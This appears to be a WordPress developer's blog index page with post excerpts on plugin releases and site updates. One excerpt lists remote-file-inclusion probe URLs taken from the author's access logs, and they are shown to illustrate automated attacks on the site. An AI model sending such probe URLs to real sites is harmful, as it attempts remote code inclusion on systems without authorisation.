Anatomy Of An Attack

In an effort to remove all invalid links and redirections from my site I’ve been paying very close attention to my access logs. Courtesy of the list that Redirection maintains I’ve noticed that my site has been under a prolonged attack.

No, there’s no panic just yet, and so far this is not something I’m worried about. The attacks appear to be part of a general ‘find any weakness in any website’ method, rather than a specific and directed attack. Let me give some details of the URLs that are being accessed:

/plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=someURL

/wp-content/plugins/myflash/myflash-button.php?wpPATH=someURL

/wp-content/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=someURL

/wp-content/plugins/Enigma2.php?boarddir=someURL

Continue reading “Anatomy Of An Attack”

Site redesign and new plugin

A new design! I decided I needed a new and fresh look and the result is the still-in-progress ‘Guangzhou’ theme. My hope is that it’s both easier to navigate, as well as being lighter and more suitable for future work. Comments, as always, are welcomed.

In conjunction with the new theme I’ve made use of WP-Cache and Gravatar cache, which should result in a noticeable speed improvement. The site itself has undergone a good clean, with all invalid code being replaced, all dead-links now corrected, and the addition of new sections for software, articles, and about myself.

On top of that I’ve added a new plugin: HTML Purified. This plugin changes the default comment filter and replaces it with HTML Purifier, a very exhaustive library that checks, validates, and corrects HTML. Not that WordPress is insecure by default, but this just beefs it up a notch, and ensures that comments are both safe and XHTML valid.

HeadSpace2 3.0.8: RSS options & update notification

Version 3.0.8 of HeadSpace2 brings with it:

  • RSS options – Change the RSS title and description for your site and category pages
  • Update notification – The HeadSpace2 plugin page will now show any updates to the plugin when they are released
  • Hack to allow HeadSpace2 to work with ImageManager plugin
  • Bug fix to remove error message when saving options

Filled In & HeadSpace – WordPress Plugins

An update on two of my WordPress plugins: HeadSpace is now standing at version 3, and Filled In at version 1.6. Both have had extensive changes. HeadSpace now allows you to define meta data across all WordPress pages, as well as supporting Ecto. Filled In is a very powerful form management system that has had a major revamp and is now much more capable and even has the ability to add CAPTCHA images to forms.

Spring Cleaning

An attempt to give my website a bit of spring cleaning has resulted in several new WordPress plugins.

The first is Tidy Up, which adds the ability to run HTML Tidy through all your posts and comments and produce a report on the quality of your HTML. If you’re feeling brave you can also have the plugin automatically fix any problems.

Next is Search Regex. As the name would suggest, this is a search and replace plugin. It allows you to search and replace phrases inside posts, pages, comments, and meta-data. In addition to plain text searches, you can also use full PHP regular expressions. This makes it very easy to bulk-modify a WordPress installation, should you decide to move directories. Several other similar plugins exist, but I couldn’t find one that provided the regular expression capability that I needed.

Continue reading “Spring Cleaning”

Anti-spam and HeadSpace 2 plugins

There’s a revamp of an old plugin over at HeadSpace 2, and a new (not foolproof) Anti-Email Spam plugin.

HeadSpace 2 cleans up my oldest plugin, and gives it a nice administrative interface along with several nice new features. The Anti-Email spam plugin was some code that I developed for client that I thought might make a handy plugin for some people. It replaces any email addresses in a post with an encoded version that should fool spam harvesting software.